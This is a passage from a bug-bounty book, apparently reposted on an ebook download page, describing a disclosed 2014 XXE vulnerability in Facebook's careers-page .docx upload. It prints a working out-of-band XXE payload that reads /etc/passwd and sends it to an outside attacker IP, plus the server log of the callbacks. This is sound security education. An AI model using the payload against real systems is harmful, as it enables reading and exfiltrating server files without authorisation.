Real-World Bug Hunting: A Field Guide to Web Hacking by Peter Yaworski

Author:Peter Yaworski
Language: eng
Format: epub, mobi
Publisher: No Starch Press, Inc.
Published: 2019-12-15T00:00:00+00:00

Takeaways

Even big companies can make mistakes. Whenever a site accepts XML, no matter who owns the site, always test for XXE vulnerabilities. Reading an /etc/passwd file is a good way to demonstrate a vulnerability’s impact on companies.

Facebook XXE with Microsoft Word

Difficulty: Hard

URL: https://facebook.com/careers/

Source: Attack Secure Blog

Date reported: April 2014

Bounty paid: $6,300

This Facebook XXE is a little more challenging than the previous example because it involves remotely calling a server. In late 2013, Facebook patched an XXE vulnerability discovered by Reginaldo Silva. Silva immediately reported the XXE to Facebook and asked for permission to escalate it to a remote code execution (a type of vulnerability covered in Chapter 12). He believed a remote code execution was possible because he could read most files on the server and open arbitrary network connections. Facebook investigated and agreed, paying him $30,000.

As a result, Mohamed Ramadan challenged himself to hack Facebook in April 2014. He didn’t think another XXE was a possibility until he found Facebook’s careers page, which allowed users to upload .docx files. The .docx file type is just an archive for XML files. Ramadan created a .docx file, opened it with 7-Zip to extract its contents, and inserted the following payload into one of the XML files:

<!DOCTYPE root [

➊ <!ENTITY % file SYSTEM "file:///etc/passwd">

➋ <!ENTITY % dtd SYSTEM "http://197.37.102.90/ext.dtd">

➌ %dtd;

➍ %send;

]>

If the target has external entities enabled, the XML parser will evaluate the %dtd; ➌ entity, which makes a remote call to Ramadan’s server http://197.37.102.90/ext.dtd ➋. That call would return the following, which is the contents of the ext.dtd file:

➎ <!ENTITY send SYSTEM 'http://197.37.102.90/FACEBOOK-HACKED?%file;'>

First, %dtd; would reference the external ext.dtd file and make the %send; entity available ➎. Next, the parser would parse %send; ➍, which would make a remote call to http://197.37.102.90/FACEBOOK-HACKED?%file; ➎. The %file; references the /etc/passwd file ➊, so its contents would replace %file; in the HTTP request ➎.

Calling a remote IP to exploit an XXE isn’t always necessary, although it can be useful when sites parse remote DTD files but block access to reading local files. This is similar to a server-side request forgery (SSRF), which was discussed in Chapter 10. With an SSRF, if a site blocks access to internal addresses but allows calls to external sites and follows 301 redirects to internal addresses, you can achieve a similar result.

Next, Ramadan started a local HTTP server on his server to receive the call and content using Python and SimpleHTTPServer:

Last login: Tue Jul 8 09:11:09 on console

➊ Mohamed:~ mohaab007$ sudo python -m SimpleHTTPServer 80

Password:

➋ Serving HTTP on 0.0.0.0 port 80...

➌ 173.252.71.129 - - [08/Jul/2014 09:21:10] "GET /ext.dtd HTTP/1.0" 200 -

173.252.71.129 - -[08/Jul/2014 09:21:11] "GET /ext.dtd HTTP/1.0" 200 -

173.252.71.129 - - [08/Jul/2014 09:21:11] code 404, message File not found

➍ 173.252.71.129 - -[08/Jul/2014 09:21:10] "GET /FACEBOOK-HACKED? HTTP/1.0" 404

At ➊ is the command to start Python SimpleHTTPServer, which returns the message "Serving HTTP on 0.0.0.0 port 80..." at ➋. The terminal waits until it receives an HTTP request to the server. At first, Ramadan didn’t receive a response, but he waited until he finally got a remote call at ➌ to retrieve the /ext.

Download

Copyright Disclaimer:
This site does not store any files on its server. We only index and link to content provided by other sites. Please contact the content providers to delete copyright contents if any and email us, we'll remove relevant links or contents immediately.